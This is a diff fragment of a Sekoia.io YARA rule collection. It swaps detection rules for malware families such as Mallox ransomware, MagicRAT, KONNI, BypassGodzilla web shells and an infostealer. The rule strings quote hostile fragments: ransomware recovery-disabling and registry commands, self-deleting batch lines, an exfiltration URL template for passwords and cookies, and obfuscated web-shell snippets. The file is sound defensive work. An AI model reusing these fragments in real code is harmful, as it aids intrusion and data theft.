-		$str14 = "<Pass encoding=\"base64\">" ascii
-		$str15 = "Soft: FileZilla" ascii
-		$str16 = "passwords.txt" ascii
-		$str17 = "build_id" ascii
-		$str18 = "file_data" ascii
+		$name_1 = "pg20"
+		$name_2 = "pg40"
+		$s1 = "Curve25519"
+		$s2 = "ConsoleApp"
+		$s3 = "e0d2eec7-eb14-48ba-8709-dcc9de65947d"
 
 	condition:
-		uint16( 0 ) == 0x5A4D and 10 of ( $str* )
+		uint16be( 0 ) == 0x4d5a and filesize < 150KB and any of ( $name_* ) and all of ( $s* )
 }
-rule SEKOIA_Tool_Sharpefspotato_Strings : FILE
+rule SEKOIA_Apt_Susp_Apt28_Uac0063_Hatvibe
 {
 	meta:
-		description = "Detects SharpEfsPotato based on strings"
+		description = "Detects some suspected UAC-0063/APT28 HTA loader"
 		author = "Sekoia.io"
-		id = "4286c72b-c0b9-4d2c-9847-68fc39ed4894"
-		date = "2023-06-20"
+		id = "c4e04671-e75f-40a4-a489-79c2ce91cf7a"
+		date = "2024-07-25"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/tool_sharpefspotato_strings.yar#L1-L18"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_susp_apt28_uac0063_hatvibe.yar#L1-L20"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "4987b0d728472186a255adc1fba2d72288dd1f2b368212afd08ea8d7ff18e992"
-		score = 75
-		quality = 80
-		tags = "FILE"
+		hash = "332d9db35daa83c5ad226b9bf50e992713bc6a69c9ecd52a1223b81e992bc725"
+		logic_hash = "41e1f97e45bc42ad3057cc173d036806687223782e54997e7803c888ee394b09"
+		score = 65
+		quality = 28
+		tags = ""
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "Program to launch (default cmd.exe)" wide
-		$ = "[!] Cannot perform interception, necessary privileges missing." wide
-		$ = "[!] Failed to created impersonated process with token:" wide
-		$ = "No authenticated interception took place, exploit failed"
+		$ = "& temp(Mid(" ascii fullword
+		$ = ".InnerHTML =" ascii fullword
+		$ = "peceert" ascii fullword
+		$ = "window.setTimeout" ascii fullword
+		$ = "cmdline = Split(" ascii fullword
 
 	condition:
-		uint16be( 0 ) == 0x4d5a and 3 of them
+		3 of them
 }
 
-rule SEKOIA_Infostealer_Win_Eternity : FILE
+rule SEKOIA_Implant_Win_Magicrat : FILE
 {
 	meta:
-		description = "Detect the Eternity infostealer based on specific strings"
+		description = "Detect Lazarus' MagicRAT"
 		author = "Sekoia.io"
-		id = "0ed8d4bd-d57f-40a8-a709-d69531d59847"
-		date = "2022-03-23"
+		id = "74973682-b214-48ee-98c3-f4b6bef76587"
+		date = "2022-09-13"
 		modified = "2024-12-19"
-		reference = "hxxp://xssforumv3isucukbxhdhwz67hoa5e2voakcfkuieq4ch257vsburuid.]onion/threads/62331/"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/infostealer_win_eternity.yar#L3-L31"
+		reference = "https://blog.talosintelligence.com/2022/09/lazarus-magicrat.html"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/implant_win_magicrat.yar#L4-L24"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "06f0f7f51100278160f5bc4f588bb6a9d749be308f879bd5704666bf90764bf9"
+		logic_hash = "9abc223c5ae9300b06b9161cbd9f5a501b6aaf46970b0bb74d98168792b7e659"
 		score = 75
 		quality = 80
 		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
-
-	strings:
-		$str0 = "Sending info to Eternity.." wide
-		$str1 = "Debug mode, dont share this stealer anywhere." wide
-		$str2 = "\\Growtopia.exe" wide
-		$str3 = "Software\\Growtopia" wide
-		$str4 = "Corrupting Growtopia.." wide
-		$str5 = "Disabling Task Manager.." wide
-		$str6 = "Deleting previous file from startup and copying new one." wide
-		$str7 = "Hiding file in Startup folder.." wide
-		$str8 = "Initializing File watcher.." wide
-		$str9 = "Decoder: Failed to delete temp login. No problem, continuing.." wide
-		$str10 = "dcd.exe" wide
+		hash1 = "9dc04153455d054d7e04d46bcd8c13dd1ca16ab2995e518ba9bf33b43008d592"
+		hash2 = "c2904dc8bbb569536c742fca0c51a766e836d0da8fac1c1abd99744e9b50164f"
+		hash3 = "f6827dc5af661fbb4bf64bc625c78283ef836c6985bb2bfb836bd0c8d5397332"
 
 	condition:
-		uint16( 0 ) == 0x5A4D and ( for any i in ( 0 .. pe.number_of_sections -1 ) : ( pe.sections [ i ] . name == ".eter0" ) and for any i in ( 0 .. pe.number_of_sections -1 ) : ( pe.sections [ i ] . name == ".eter1" ) ) or 4 of ( $str* )
+		uint16( 0 ) == 0x5A4D and filesize > 15MB and for any i in ( 0 .. pe.number_of_sections -1 ) : ( hash.md5 ( pe.sections [ i ] . raw_data_offset , pe.sections [ i ] . raw_data_size ) == "39dfb9f035cba21ffd90973904f90469" and pe.sections [ i ] . name == ".qtmetad" )
 }
-rule SEKOIA_Apt_Shadowpad_First_Called_Function : FILE
+rule SEKOIA_Apt_Gelsemium_Firewood_Backdoor : FILE
 {
 	meta:
-		description = "Detects entrypoint of shadowpad"
+		description = "Detects Gelsemium's FireWood backdoor"
 		author = "Sekoia.io"
-		id = "3ce1ffd3-5c30-4b36-b7cc-c9fa873ebc25"
-		date = "2023-01-30"
+		id = "93670c07-9edd-4ea2-b8ed-6fee625491f4"
+		date = "2024-11-22"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_shadowpad_first_called_function.yar#L1-L36"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_gelsemium_firewood_backdoor.yar#L1-L21"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "a40db3fad01f4177973fd50bd489e5c4ff6d3592dfff063c2c31694007c31e0b"
+		hash = "2251bc7910fe46fd0baf8bc05599bdcf"
+		logic_hash = "dea8c7cfb35b3cc026a0df844e118b495e3ad0a85f55e2fd3b63a41dde2ea944"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -259130,151 +259210,155 @@ rule SEKOIA_Apt_Shadowpad_First_Called_Function : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$chunk_1 = {
-        48 83 EC 28
-        33 C9
-        FF 15 ?? ?? ?? ??
-        8B 80 ?? ?? ?? ??
-        3B 05 ?? ?? ?? ??
-        74 ??
-        E8 ?? ?? ?? ??
-        E8 ?? ?? ?? ??
-        EB ??
-        48 8B 0D ?? ?? ?? ??
-        E8 ?? ?? ?? ??
-        8B C8
-        FF 15 ?? ?? ?? ??
-        90
-        B9 28 04 00 00
-        FF 15 ?? ?? ?? ??
-        90
-        48 83 C4 28
-        C3
-        }
+		$ = "root dir:%s"
+		$ = "df -h|grep 'dev' |grep -v none|awk '/dev/{print $6}'"
+		$ = "rm -rf ../lib/%s"
+		$ = "Total Disk space:%luG, Free Disk spae:%luG"
 
 	condition:
-		uint16be( 0 ) == 0x4d5a and all of them
+		uint32be( 0 ) == 0x7f454c46 and filesize < 1MB and all of them
 }
-rule SEKOIA_Apt_Susp_Apt28_Uac0063_Malicious_Doc : FILE
+rule SEKOIA_Hacktool_Pplblade_Strings : FILE
 {
 	meta:
-		description = "Detects some suspected APT28 document"
+		description = "Detects PPLBlade"
 		author = "Sekoia.io"
-		id = "2b9d597a-a6cd-49df-8938-7103342a1d06"
-		date = "2024-07-25"
+		id = "1a443621-fc95-4a70-873e-c1389943d4ab"
+		date = "2023-11-23"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_susp_apt28_uac0063_malicious_doc.yar#L1-L18"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/hacktool_pplblade_strings.yar#L1-L19"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		hash = "93322be0785556e627d2b09832c18e39c115e6a6fbff64b1e590e1ddcf8f6a43"
-		logic_hash = "27aeadbb76dd4e670a85e8fcd1e885b69845537dd937aacc1808902e75008848"
-		score = 65
+		logic_hash = "e853e109dbf5dfcba465f61cb689f261df5156e98297d3d00f700e20491de66e"
+		score = 75
 		quality = 80
 		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "Sub pop() : : End Sub" ascii fullword
-		$ = "%localappdata%\\Temp" ascii fullword
-		$ = "rthedbv" ascii fullword
+		$ = "shirou/gopsutil/internal/"
+		$ = ".miniDumpWriteDump"
+		$ = ".DRIVER_FULL_PATH"
 
 	condition:
-		2 of them and filesize < 1MB
+		uint16be( 0 ) == 0x4d5a and filesize > 4MB and filesize < 6MB and all of them
 }
-rule SEKOIA_Apt_Apt29_Wineloader_Malicious_Hta
+rule SEKOIA_Loader_Win_Konni_Bat : FILE
 {
 	meta:
-		description = "Detects malicious HTA used by APT29 to drop Wineloader"
+		description = "Detect the BAT files (named trap.bat or yup.bat) used by KONNI"
 		author = "Sekoia.io"
-		id = "5a17d854-0564-4830-a0e5-7867b99716c2"
-		date = "2024-03-25"
+		id = "e8921336-6c91-4b46-bd3f-3cf4a9b31082"
+		date = "2023-09-26"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_apt29_wineloader_malicious_hta.yar#L1-L18"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/loader_win_konni_bat.yar#L1-L22"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		hash = "efafcd00b9157b4146506bd381326f39"
-		logic_hash = "0cc4692e5ff3f258c287f28030147f725d6a534c4f2f7a2a4ff49a305b7fd13d"
+		logic_hash = "3476e41461692c3ccfc0ef47a4d5b8822c4940987755763d2a5913e27d9350d4"
 		score = 75
 		quality = 80
-		tags = ""
+		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "<HTA:APPLICATION ID="
-		$ = "var _0x"
-		$ = "Date['\\x6e\\x6f\\x77']"
+		$ = "del /f /q \"%~dp0\\*.zip\" > nul"
+		$ = "del /f /q \"%~dp0\\*.xml\" > nul"
+		$ = "del /f /q \"%~dp0\\wpnprv*.dll\" > nul"
+		$ = "del /f /q \"%~dp0\\*.bat\" > nul"
+		$ = "del /f /q \"%~dpnx0\" > nul"
+		$ = "echo %~dp0 | findstr /i \"system32\" > nul"
+		$ = "if %ERRORLEVEL% equ 0 (goto INSTALL) else (goto COPYFILE)"
+		$ = "if exist \"%ProgramFiles(x86)%\" ("
 
 	condition:
-		all of them
+		3 of them and filesize < 3KB
 }
-rule SEKOIA_Apt_Implant_Xdealer_Vbs_Launcher_Strings : FILE
+rule SEKOIA_Loader_Win_Squirrelwaffle_Doc : FILE
 {
 	meta:
-		description = "Detects XDealer VBS Launcher"
+		description = "Detect the Squirrelwaffle malicious document (not xls)"
 		author = "Sekoia.io"
-		id = "ebfc8a33-70dc-44d5-bc4a-07afc56f8254"
-		date = "2024-03-22"
+		id = "caadeac3-d4c7-4d84-b539-c03cc4c6c274"
+		date = "2021-09-20"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_implant_xdealer_vbs_launcher_strings.yar#L1-L17"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/loader_win_squirrelwaffle_doc.yar#L1-L18"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "e206189fd21ed7b3bf48a51d955df9055b7f7aa502b7fac52b274cc414adea0d"
+		logic_hash = "b9f7c3605e25c8c7caa5f70e492d46fb70e7cb6002704440e7346ebfb2bbc7bf"
 		score = 75
-		quality = 80
+		quality = 76
 		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$s1 = "Dim objws"
-		$s2 = "Set objws="
-		$s3 = "objws.Run \"\"\"C:\\ProgramData\\"
+		$s1 = {4f4b31203d2022636d64202f632072756e646c6c33322e65786520433a5c50726f6772616d446174615c777777312e646c6c2c6c647222}
+		$s2 = {4145524f2042495a20434f4d20434f4f502045445520474f5620494e464f20494e54204d494c204d555345554d204e414d45204e4554204f52472050524f}
 
 	condition:
-		$s1 at 0 and all of them and filesize < 200
+		any of them and filesize > 100KB
 }
-rule SEKOIA_Apt_Unc4990_Explorer_Ps1
+rule SEKOIA_Ransomware_Mallox : FILE
 {
 	meta:
-		description = "Detects powershell script (explorer.ps1)"
+		description = "Rule to detect mallox ransomware samples."
 		author = "Sekoia.io"
-		id = "2e1abbbf-f9b7-4147-b7da-3544cbc4a5f1"
-		date = "2024-02-01"
+		id = "7e2edc94-26e4-4024-8bc0-8e90d76f5a96"
+		date = "2023-02-20"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_unc4990_explorer_ps1.yar#L1-L19"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/ransomware_mallox.yar#L1-L38"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "5085f738e23b801c7e36408d189755086d91c0bb266af6738c80510eb85e598f"
+		logic_hash = "c9300de42ee9eb3e820f49aa979234ff61c33dc6bf5d65bcb26e45b7126aafec"
 		score = 75
-		quality = 80
-		tags = ""
+		quality = 54
+		tags = "FILE"
 		version = "1.0"
+		modification_date = "2023-05-24"
 		classification = "TLP:CLEAR"
+		hash1 = "2a549489e2455a2d84295604e29c727dd20d65f5a874209840ce187c35d9a439"
+		hash2 = "3f843cbffeba010445dae2b171caaa99c6b56360de5407da71210d007fe26673"
+		hash3 = "4075d6e02c022ee45e0cd1c826abf749200639ee8ebc42375dac2430abafb5d6"
+		hash4 = "4db69a0643f6ec795e5450a0563605e91293f233aa60715ae09ed8effa3b7267"
+		hash5 = "77fdce66e7f909300e4493cbe7055254f7992ba65f9b7445a6755d0dbd9f80a5"
+		hash6 = "8e974a3be94b7748f7971f278160a74d738d5cab2c3088b1492cfbbd05e83e22"
+		hash7 = "a5085e571857ec54cf9625050dfc29a195dad4d52bea9b69d3f22e33ed636525"
+		hash8 = "df64e87ecb30f4cadf54f2c1b3d3cba8cc2d315db0fd4af2d11add57baa56f6a"
+		hash9 = "e7e00e0f817fcb305f82aec2e60045fcdb1b334b2621c09133b6b81284002009"
 
 	strings:
-		$s0 = "$(get-location).Path"
-		$s1 = "+ \"\\Runtime Broker.exe"
-		$s2 = "Start-Process -FilePath"
-		$s3 = "-Wait;"
-		$s4 = "Start-Sleep -s"
+		$s1 = "C:\\HOW TO RECOVER !!.TXT" wide ascii nocase
+		$s2 = "SYSTEM\\CurrentControlSet\\Services\\EventLog\\Application\\Raccine" wide ascii nocase
+		$s3 = "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\vssadmin.exe" wide ascii nocase
+		$s4 = "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\wmic.exe" wide ascii nocase
+		$s5 = "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\wbadmin.exe" wide ascii nocase
+		$s6 = "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\bcdedit.exe" wide ascii nocase
+		$s7 = "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\powershell.exe" wide ascii nocase
+		$s8 = "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\diskshadow.exe" wide ascii nocase
+		$s9 = "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\net.exe" wide ascii nocase
+		$s10 = "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\taskkill.exe" wide ascii nocase
+		$s11 = "bcdedit /set {current} recoveryenabled no" wide ascii nocase
+		$mallox_fargo = ".FARGO" wide ascii nocase
+		$mallox_mallox = ".mallox" wide ascii nocase
+		$mallox_exploit = "newexploit@tutanota.com"
 
 	condition:
-		all of them and @s3- @s2 < 35
+		uint16be( 0 ) == 0x4d5a and all of ( $s* ) and 1 of ( $mallox_* )
 }
-rule SEKOIA_Infostealer_Win_Xehook_Str : FILE
+rule SEKOIA_Tool_Sharpnbtscan_Strings : FILE
 {
 	meta:
-		description = "Finds XehookStealer standalone samples based on specific strings."
+		description = "Detects SharpNBTScan based on strings"
 		author = "Sekoia.io"
-		id = "fa76988d-f0a2-4fc2-a122-c104fd585f34"
-		date = "2024-06-12"
+		id = "e9d28dcb-b4b1-4d66-b225-ed0925f307d9"
+		date = "2024-09-09"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/infostealer_win_xehook_str.yar#L1-L32"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/tool_sharpnbtscan_strings.yar#L1-L19"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "543ec3b523e5f00d3c285e453c8d11f3d5c7778b2986b7fe03f2d62ff18c2778"
+		logic_hash = "adc19140e84c4aa3433b8ae4096355e384bbd106326ed56b54fb44a86fd9fbc6"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -259282,75 +259366,83 @@ rule SEKOIA_Infostealer_Win_Xehook_Str : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$str01 = "xehook" ascii
-		$str02 = "Classes.LogRecord" ascii
-		$str03 = "__  _____| |__   ___   ___ | | __" wide
-		$str04 = "\\ \\/ / _ \\ '_ \\ / _ \\ / _ \\| |/ /" wide
-		$str05 = " >  <  __/ | | | (_) | (_) |   <" wide
-		$str06 = "/_/\\_\\___|_| |_|\\___/ \\___/|_|\\_\\" wide
-		$str07 = "https://t.me/xehook" wide
-		$str08 = "About PC.txt" wide
-		$str09 = "Browser: {4} v{5} ({6})" wide
-		$str10 = "http://ip-api.com/json/?fields=11827" wide
-		$str11 = "{0}gate.php?id={1}&build={2}&passwords={3}&cookies={4}" wide
-		$str12 = "getjson.php?id=" wide
-		$com01 = "CheckRemoteDebuggerPresent" ascii
-		$com02 = "get_CurrentThread" ascii
-		$com03 = "get_InstalledInputLanguages" ascii
-		$com04 = "get_Ticks" ascii
-		$com05 = "System.Security.Cryptography" ascii
+		$ = "[+]Udp client will stop in 10 s ..." ascii wide
+		$ = "[*]Stop udp client ..." ascii wide
+		$ = "[*]Start udp client ..." ascii wide
+		$ = "[+] ip range {0} - {1} " ascii wide
 
 	condition:
-		uint16( 0 ) == 0x5A4D and 2 of ( $str* ) and 4 of ( $com* )
+		uint32be( 0 ) == 0x5A4D and all of them
 }
-rule SEKOIA_Apt_Mustangpanda_Windows_Shellcode_Decryptionalgorithm : FILE
+
+rule SEKOIA_Rat_Win_Romcom_Payload
 {
 	meta:
-		description = "Decryption routine for Shellcode of MustangPanda"
+		description = "Detect the RomCom malware"
 		author = "Sekoia.io"
-		id = "c9873a5f-97a6-477f-a1a0-650441c73444"
-		date = "2022-12-05"
+		id = "c391f84c-f0cb-42d8-a8d8-d59725bf74c2"
+		date = "2022-11-04"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_mustangpanda_windows_shellcode_decryptionalgorithm.yar#L1-L28"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/rat_win_romcom_payload.yar#L4-L17"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "a2ad3bd4dcbee3e23762b674ee8b6717e7ece712b0128145518bfa5d2e4bd66a"
+		logic_hash = "56f016df8e9165522e18f34bdb7c3044ee8927f53dd6818fa2b3d6424191d8e0"
 		score = 75
 		quality = 80
+		tags = ""
+		version = "1.0"
+		classification = "TLP:CLEAR"
+
+	condition:
+		for any i in ( 0 .. pe.number_of_resources -1 ) : ( hash.sha256 ( pe.resources [ i ] . offset , pe.resources [ i ] . length ) == "160ed1cdf6e9321cef19cfed6a63b4b5557dd35e174b821bf8a81c4146fa6536" )
+}
+rule SEKOIA_Apt_Mustangpanda_Mqsttang_Qmagent : FILE
+{
+	meta:
+		description = "Detects specifics string of MQsTTang, also known as QMAGENT"
+		author = "Sekoia.io"
+		id = "bcf6f961-0d9b-4fbc-81d2-f5d00c68d4d5"
+		date = "2023-03-27"
+		modified = "2024-12-19"
+		reference = "https://github.com/SEKOIA-IO/Community"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_mustangpanda_mqsttang_qmagent.yar#L1-L23"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
+		logic_hash = "4e7aa53e561cad512b031240bce6ad207b80ff7438eee39cd05bb92412aaa632"
+		score = 75
+		quality = 30
 		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$chunk_1 = {
-        7E ??
-        8B 55 ??
-        53
-        56
-        8B 75 ??
-        57
-        8B 7D ??
-        4F
-        8D A4 24 ?? ?? ?? ??
-        8A 1C 11
-        30 1C 30
-        }
+		$s1 = "iot/server"
+		$s2 = "QMQTT::Message"
+		$s3 = "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run"
+		$command1 = "c_topic"
+		$command2 = "Alive"
+		$command3 = "msg"
+		$command4 = "ret"
 
 	condition:
-		filesize < 8MB and all of them
+		( uint32be( 0 ) == 0x7f454c46 or uint16be( 0 ) == 0x4d5a ) and filesize < 8MB and all of them
 }
-rule SEKOIA_Apt_Toddycat_Tomberbil_Strings : FILE
+rule SEKOIA_Tool_Bypassgodzilla : FILE
 {
 	meta:
-		description = "Detects TomBerBil password stealer"
+		description = "Detects payload of BypassGodzilla"
 		author = "Sekoia.io"
-		id = "b16f4d35-ea59-4439-8ddb-2c0415b97b9b"
-		date = "2024-04-23"
+		id = "fa492f97-a46c-422d-a617-c503744ee22e"
+		date = "2024-09-09"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_toddycat_tomberbil_strings.yar#L1-L22"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/tool_bypassgodzilla.yar#L1-L38"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "92da6ba86cffec75a9af90a513840672b023c81baa9aedb2b706534cc39ecc09"
+		hash = "571c9042c627abba19ba1d591e2083eb"
+		hash = "56cfc5a876f8f55bf184be9f368b6d8a"
+		hash = "d4f7ca537701aee8849c474bc4df19d1"
+		hash = "e4be04331c5f447b3ca03aa637d16c85"
+		hash = "905fa3b692577a086ac654ef89e8b83d"
+		logic_hash = "47e52267c73209c6191910ac21bca44acac2100be96250fd5dda1f889fb03b07"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -259358,59 +259450,82 @@ rule SEKOIA_Apt_Toddycat_Tomberbil_Strings : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "[+] Begin" ascii wide
-		$ = "[+] Delete File" ascii wide
-		$ = "[+] Current user" ascii wide
-		$ = "[+] Impersonate user" ascii wide
-		$ = "[+] Local State File" ascii wide
-		$ = "[>] Profile" ascii wide
+		$jsp_1a = "response.getWriter().write(\""
+		$jsp_1b = "\".substring("
+		$jsp_2a = "response.getWriter().write(java.util.Base64/*"
+		$jsp_2b = "*/.getEncoder()/*"
+		$jsp_2c = ".toByteArray(),true)));"
+		$asp_1 = "[\"payload\"]).CreateInstance(\"LY\");"
+		$asp_2 = "\\U00000045\\U00000071\\U00000075\\U00000061\\U0000006C\\U00000073(Context);"
+		$php_1 = "=(\"!\"^\"@\").'ss'.Chr(\"101\").'rs';"
+		$php_2 = "*/md5/*"
+		$php_3 = "*/isset($_SESSION/*"
+		$php_4 = "@set_time_limit(Chr(\"48\"))"
 
 	condition:
-		uint16be( 0 ) == 0x4d5a and filesize < 1MB and 4 of them
+		(( all of ( $jsp_* ) and ( @jsp_1b- @jsp_1a < 70 ) and ( @jsp_2b- @jsp_2a < 70 ) and ( @jsp_2c - @jsp_2a < 160 ) ) or ( all of ( $asp_* ) and ( @asp_2 > @asp_1 ) ) or ( all of ( $php_* ) ) ) and filesize < 30KB and true
 }
-rule SEKOIA_Loader_Win_Konni_Bat : FILE
+rule SEKOIA_Manjusaka_Samples : FILE
 {
 	meta:
-		description = "Detect the BAT files (named trap.bat or yup.bat) used by KONNI"
+		description = "Detects Manjusaka via protobuf struture names (Windows / Linux / implants / C2)"
 		author = "Sekoia.io"
-		id = "e8921336-6c91-4b46-bd3f-3cf4a9b31082"
-		date = "2023-09-26"
+		id = "7aa8edb3-2e67-4632-af68-5b65c9aefe39"
+		date = "2022-08-04"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/loader_win_konni_bat.yar#L1-L22"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/manjusaka_samples.yar#L1-L41"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "3476e41461692c3ccfc0ef47a4d5b8822c4940987755763d2a5913e27d9350d4"
+		logic_hash = "58dcc406c87a8ec66c0904c4cf518cb38bca1aa9058196ce5d496f6269258200"
 		score = 75
-		quality = 80
+		quality = 78
 		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "del /f /q \"%~dp0\\*.zip\" > nul"
-		$ = "del /f /q \"%~dp0\\*.xml\" > nul"
-		$ = "del /f /q \"%~dp0\\wpnprv*.dll\" > nul"
-		$ = "del /f /q \"%~dp0\\*.bat\" > nul"
-		$ = "del /f /q \"%~dpnx0\" > nul"
-		$ = "echo %~dp0 | findstr /i \"system32\" > nul"
-		$ = "if %ERRORLEVEL% equ 0 (goto INSTALL) else (goto COPYFILE)"
-		$ = "if exist \"%ProgramFiles(x86)%\" ("
+		$ = ".protos.AgentStatusR" ascii wide
+		$ = ".protos.AgentsR" ascii wide
+		$ = ".protos.FileActionR" ascii wide
+		$ = ".protos.FileEntryR" ascii wide
+		$ = ".protos.HttpFileActionR" ascii wide
+		$ = ".protos.HttpFileEntryR" ascii wide
+		$ = ".protos.PassResultR" ascii wide
+		$ = ".protos.PortResultR" ascii wide
+		$ = ".protos.PortResultR" ascii wide
+		$ = ".protos.PortResultR" ascii wide
+		$ = ".protos.ConfigH" ascii wide
+		$ = ".protos.AgentUpdateH" ascii wide
+		$ = ".protos.PluginExecH" ascii wide
+		$ = ".protos.PluginLoadH" ascii wide
+		$ = ".protos.ReqCwdH" ascii wide
+		$ = ".protos.ReqCmdH" ascii wide
+		$ = ".protos.ReqListFileH" ascii wide
+		$ = ".protos.ReqCatFileH" ascii wide
+		$ = ".protos.ReqNetStatH" ascii wide
+		$ = ".protos.ReqTaskListH" ascii wide
+		$ = ".protos.ReqScreenH" ascii wide
+		$ = ".protos.FileEventH" ascii wide
+		$ = ".protos.HttpFileEventH" ascii wide
+		$ = ".protos.PassGetEventH" ascii wide
+		$ = ".protos.FileGetEventH" ascii wide
+		$ = ".protos.AgentEventR" ascii wide
 
 	condition:
-		3 of them and filesize < 3KB
+		( uint32be( 0 ) == 0x7f454c46 or uint16be( 0 ) == 0x4d5a ) and 15 of them
 }
-rule SEKOIA_Backdoor_Sandman_Strings : FILE
